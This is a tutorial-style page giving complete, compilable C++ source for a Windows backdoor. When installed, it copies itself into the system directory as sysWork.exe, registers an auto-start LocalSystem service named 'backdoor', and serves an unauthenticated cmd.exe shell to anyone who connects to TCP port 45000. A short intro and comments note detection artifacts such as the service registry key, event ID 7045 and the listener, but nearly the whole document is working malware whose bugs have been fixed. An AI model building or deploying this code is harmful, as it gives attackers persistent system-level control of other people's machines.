Brief introduction
On Windows NT-family systems a backdoor can be made to start automatically in many ways, for example registry Run keys, Image File Execution Options ("image hijacking"), svchost-hosted services, and the method shown in this section: installing the program as a Windows service. The original author claims that service-based autostart is less likely to be noticed than the other three because those require registry modification. Note, however, that creating a service also writes to the registry (a new key under HKLM\SYSTEM\CurrentControlSet\Services\&lt;name&gt;), and the Service Control Manager logs every service installation to the System event log (event ID 7045; a Security-log event is also produced when the relevant audit policy is enabled), so this technique is readily visible to anyone monitoring those artifacts.
Example C++ code
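// filename: serviceautorundemo.cpp
// Creator: peterz1997
// date: 2018-5-4 23:19
// comment: create Service to make the backdoor Run automatically
//
// Reviewer summary -- what this program does, as established by the code below:
//   * `--install` copies its own executable to <SystemDirectory>\sysWork.exe,
//     registers that copy as an auto-start Win32 service named "backdoor" and
//     starts it.  CreateService is called with a NULL start-name, which per the
//     CreateService contract means the service runs as LocalSystem.
//   * When launched by the SCM it binds TCP 0.0.0.0:45000 and, for each incoming
//     connection, spawns <SystemDirectory>\cmd.exe with the client socket as
//     stdin/stdout/stderr.  There is NO authentication: any host that can reach
//     port 45000 gets an interactive shell under the service account.
//   * `--remove` stops and deletes the service; the copied binary is left behind.
// Detection artifacts that follow directly from the above: the file sysWork.exe
// in the system directory, a service named "backdoor" (every service install also
// creates a key under HKLM\SYSTEM\CurrentControlSet\Services), and a listener on
// TCP/45000 owned by that service process.
//
// Build note: the listing was recovered from a badly mangled web page and has been
// re-typed with conventional Win32 identifier casing so that it compiles with MSVC.
// Behavioural changes versus the recovered original are marked "FIX:" below; they
// are limited to handle/socket leaks, a NULL-handle close, a fall-through on an
// unexpected CreateService error, and an unbounded retry loop.

#include <iostream>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>
#include <Winsvc.h>
#include <cstdio>
#include <cstring>
#pragma comment(lib, "Ws2_32.lib")
using namespace std;

#define SERVICE_OP_ERROR    -1
#define SERVICE_ALREADY_RUN -2

// Service name used for CreateService / OpenService / RegisterServiceCtrlHandler.
// The recovered listing used "backdoor" and "Backdoor " inconsistently; service
// names are matched case-insensitively by the SCM, but a stray trailing space
// would not be, so one constant is used everywhere.
#define SERVICE_NAME "backdoor"

const unsigned int MAX_COUNT  = 255;   // String max length
const DWORD        PORT       = 45000; // Listen port
const unsigned int LINK_COUNT = 30;    // Max link number (connections accepted before the listener exits)

SERVICE_STATUS        g_ServiceStatus;
SERVICE_STATUS_HANDLE g_hServiceStatus;

/**
 * @brief CallBack function to translate service control codes.
 * @param dwCode Service control code delivered by the SCM.
 *
 * Only the global status record is updated here; nothing signals the listener
 * thread, so PAUSE/STOP do not actually interrupt an open shell session.
 */
void WINAPI ServiceControl(DWORD dwCode)
{
    switch (dwCode) {
    case SERVICE_CONTROL_PAUSE:         // service pause
        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE:      // service continuation
        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:          // service stop
        g_ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        g_ServiceStatus.dwWin32ExitCode = 0;
        g_ServiceStatus.dwCheckPoint    = 0;
        g_ServiceStatus.dwWaitHint      = 0;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;
    default:
        break;
    }
    // Report the (possibly unchanged) state back to the SCM.
    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0) {
        printf("Set service status error\n");   // no console in a service; effectively silent
    }
}

/**
 * @brief Start a remote shell on one client connection.
 * @param lpParam The client SOCKET, smuggled through the LPVOID thread argument.
 * @return 0 when cmd.exe ran to completion, 1 if it could not be started.
 *
 * cmd.exe inherits the socket as all three standard handles, so everything the
 * client sends is typed into the shell and all output goes back over the wire.
 * The socket is NOT closed here; the caller (RunService) owns it.
 */
DWORD WINAPI StartShell(LPVOID lpParam)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CHAR cmdLine[MAX_COUNT] = {0};
    SOCKET sClient = (SOCKET)lpParam;

    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sClient;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;

    // <SystemDirectory>\cmd.exe -- GetSystemDirectory's return value is unchecked,
    // as in the original; on failure the path degenerates to "\cmd.exe".
    GetSystemDirectory(cmdLine, sizeof(cmdLine));
    strcat_s(cmdLine, sizeof(cmdLine), "\\cmd.exe");

    // bInheritHandles = TRUE so the socket handle reaches the child.
    // FIX: the original looped `while (!CreateProcess(...)) Sleep(100);`, spinning
    // forever if cmd.exe can never be started; give up instead.
    if (!CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
        return 1;
    }

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}

/**
 * @brief Service worker: accept connections and hand each one a shell.
 * @param lpParam Unused (NULL).
 * @return Always 0.
 *
 * Listens on INADDR_ANY:PORT, accepts at most LINK_COUNT connections (one
 * StartShell thread each), then waits for every shell to exit and returns.
 * After LINK_COUNT accepts no further connections are served until the
 * service is restarted -- this is the original design, kept as-is.
 */
DWORD WINAPI RunService(LPVOID lpParam)
{
    CHAR wMessage[MAX_COUNT] = "<================= Welcome to back Door >_< ==================>\n";
    SOCKET sClient[LINK_COUNT];
    DWORD dwThreadId[LINK_COUNT];
    HANDLE hThread[LINK_COUNT];
    WSADATA wsd;

    if (WSAStartup(0x0202, &wsd)) {
        printf("WSAStartup Process error\n");
        return 0;
    }

    // dwFlags == 0 (no WSA_FLAG_OVERLAPPED): presumably deliberate so the socket
    // handle can be used directly as a child's std handle -- confirm if changing.
    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sListen == INVALID_SOCKET) {
        WSACleanup();
        return 0;
    }

    sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;   // all interfaces, not just loopback
    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin)) || listen(sListen, LINK_COUNT)) {
        closesocket(sListen);                // FIX: original leaked the socket here
        WSACleanup();
        return 0;
    }

    unsigned int started = 0;
    for (; started < LINK_COUNT; started++) {
        SOCKET s = accept(sListen, NULL, NULL);
        if (s == INVALID_SOCKET) {
            break;                           // FIX: original passed INVALID_SOCKET on to a thread
        }
        sClient[started] = s;
        // Banner first, then the shell thread: the original sent the banner after
        // CreateThread, so it could interleave with cmd.exe's own startup output.
        send(s, wMessage, (int)strlen(wMessage), 0);
        hThread[started] = CreateThread(NULL, 0, StartShell, (LPVOID)s, 0, &dwThreadId[started]);
        if (hThread[started] == NULL) {
            closesocket(s);
            break;                           // FIX: a NULL handle would break WaitForMultipleObjects
        }
    }

    // Block until every shell thread has finished, then release what we own.
    if (started > 0) {
        WaitForMultipleObjects(started, hThread, TRUE, INFINITE);
    }
    for (unsigned int i = 0; i < started; i++) {
        CloseHandle(hThread[i]);             // FIX: thread handles were never closed
        closesocket(sClient[i]);             // FIX: client sockets were never closed
    }
    closesocket(sListen);
    WSACleanup();                            // FIX: WSAStartup was never balanced
    return 0;
}

/**
 * @brief The main function of the service (SCM entry point).
 * @param dwArgc Argument count from the SCM (unused).
 * @param lpArgv Arguments from the SCM (unused).
 *
 * Registers the control handler, reports RUNNING, then starts RunService on
 * its own thread and returns immediately; the SCM keeps the process alive.
 * dwServiceType is reported as SERVICE_WIN32 while the service was created as
 * SERVICE_WIN32_OWN_PROCESS -- kept as in the original.
 */
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)
{
    HANDLE hThread;

    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;
    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    g_ServiceStatus.dwServiceSpecificExitCode = 0;
    g_ServiceStatus.dwServiceType = SERVICE_WIN32;
    g_ServiceStatus.dwWaitHint = 0;
    g_ServiceStatus.dwWin32ExitCode = 0;

    g_hServiceStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceControl);
    if (!g_hServiceStatus) {
        printf("Register Service error\n");
        return;
    }

    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwWaitHint = 0;
    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus)) {
        printf("Set servicestatus Error!\n");
        return;
    }

    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);
    if (!hThread) {
        printf("Create Thread error\n");
    } else {
        CloseHandle(hThread);   // FIX: the thread keeps running; only the handle is released
    }
}

/**
 * @brief Install the service: copy self to the system directory, create an
 *        auto-start service pointing at the copy, and start it.
 * @return 0 on success, SERVICE_ALREADY_RUN if the service was already running,
 *         SERVICE_OP_ERROR on any other failure.
 *
 * Requires an account that can write to the system directory and open the SCM
 * with SC_MANAGER_ALL_ACCESS (i.e. administrator).
 */
int APIENTRY InstallService()
{
    DWORD dwErrorCode;
    SC_HANDLE hSCManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;
    CHAR szSystemPath[MAX_COUNT] = {0};
    CHAR szFileSelfPath[MAX_COUNT] = {0};

    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));
    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));
    strcat_s(szSystemPath, "\\sysWork.exe");
    // bFailIfExists = TRUE: an existing copy is kept.  The result is unchecked
    // (as in the original); if the copy fails and no earlier copy exists, the
    // service is registered against a missing binary and StartService fails.
    CopyFile(szFileSelfPath, szSystemPath, TRUE);

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hSCManager) {
        printf("Can not Open the Service manager\n");
        return SERVICE_OP_ERROR;
    }
    printf("Service Manager opened success\n");

    // Start-name NULL => LocalSystem; SERVICE_AUTO_START => launched at boot.
    hServiceHandle = CreateService(hSCManager, SERVICE_NAME, SERVICE_NAME, SERVICE_ALL_ACCESS,
                                   SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE,
                                   szSystemPath, NULL, NULL, NULL, NULL, NULL);
    if (!hServiceHandle) {
        dwErrorCode = GetLastError();
        if (dwErrorCode == ERROR_SERVICE_EXISTS) {
            hServiceHandle = OpenService(hSCManager, SERVICE_NAME, SERVICE_ALL_ACCESS);
            if (!hServiceHandle) {
                printf("Can not Create/open service\n");
                CloseServiceHandle(hSCManager);   // FIX: original closed the NULL service handle and leaked this one
                return SERVICE_OP_ERROR;
            }
            printf("Service opened success\n");
        } else {
            // FIX: the original fell through here with a NULL handle into StartService.
            printf("Can not Create/open service\n");
            CloseServiceHandle(hSCManager);
            return SERVICE_OP_ERROR;
        }
    } else {
        printf("Service Create success\n");
    }

    if (!StartService(hServiceHandle, 0, NULL)) {
        dwErrorCode = GetLastError();
        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING) {
            printf("Serveice is already running\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hSCManager);
            return SERVICE_ALREADY_RUN;
        }
        printf("Serveice START error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hSCManager);
        return SERVICE_OP_ERROR;
    }

    // Poll until the service leaves START_PENDING.
    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus)) {
        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING) {
            Sleep(100);
            continue;
        }
        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING) {
            printf("SERVICE Start Process error\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hSCManager);
            return SERVICE_OP_ERROR;
        }
        break;
    }
    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus)) {
        printf("Service Status Get error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hSCManager);
        return SERVICE_OP_ERROR;
    }

    printf("Service Start success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hSCManager);
    return 0;
}

/**
 * @brief Remove the service: stop it if running, then mark it for deletion.
 * @return 0 on success, SERVICE_OP_ERROR on failure.
 *
 * DeleteService only marks the entry; the SCM removes it once the service has
 * stopped and all handles are closed.  The sysWork.exe copy is not deleted.
 */
int RemoveService()
{
    SC_HANDLE hSCManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;

    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hSCManager) {
        printf("Open Service Manager error\n");
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Manager success\n");

    hServiceHandle = OpenService(hSCManager, SERVICE_NAME, SERVICE_ALL_ACCESS);
    if (!hServiceHandle) {
        printf("Open Service error\n");
        CloseServiceHandle(hSCManager);   // FIX: original leaked the SCM handle here
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Success\n");

    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus)) {
        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING) {
            // Result unchecked, as in the original: DeleteService is attempted regardless.
            ControlService(hServiceHandle, SERVICE_CONTROL_STOP, &ssServiceStatus);
        }
    } else {
        printf("Service Status Get error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hSCManager);
        return SERVICE_OP_ERROR;
    }

    if (!DeleteService(hServiceHandle)) {
        printf("Delete Service error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hSCManager);
        return SERVICE_OP_ERROR;
    }

    printf("Remove Service success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hSCManager);
    return 0;
}

/**
 * @brief Program entry point.
 *
 * StartServiceCtrlDispatcher is called first, unconditionally:
 *   - when launched by the SCM it blocks until the service stops, then the
 *     usage branch below runs (to no console) and the process exits;
 *   - when launched from a console it fails immediately and execution falls
 *     through to the --install / --remove handling.
 * Note that InstallService's SERVICE_ALREADY_RUN (-2) is reported as success,
 * because only SERVICE_OP_ERROR is treated as a failure -- original behaviour.
 */
int main(int argc, char* argv[])
{
    SERVICE_TABLE_ENTRY svTable[] = {
        {(LPSTR)SERVICE_NAME, ServiceMain},
        {NULL, NULL}
    };
    StartServiceCtrlDispatcher(svTable);

    if (argc == 2) {
        if (!_stricmp(argv[1], "--install")) {
            if (InstallService() == SERVICE_OP_ERROR) {
                printf("[!] Service Operation Error\n");
            } else {
                printf("[*]service Operation Success\n");
            }
        } else if (!_stricmp(argv[1], "--remove")) {
            if (RemoveService() == SERVICE_OP_ERROR) {
                printf("[!] Service Operation Error\n");
            } else {
                printf("[*]service Operation Success\n");
            }
        } else {
            printf("[Usage] = *.exe [--install]/[--remove]\n");
        }
    } else {
        printf("[Usage] = *.exe [--install]/[--remove]\n");
    }
    return 0;
}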
Secure Path -- C/C++ implementation of a self-starting backdoor service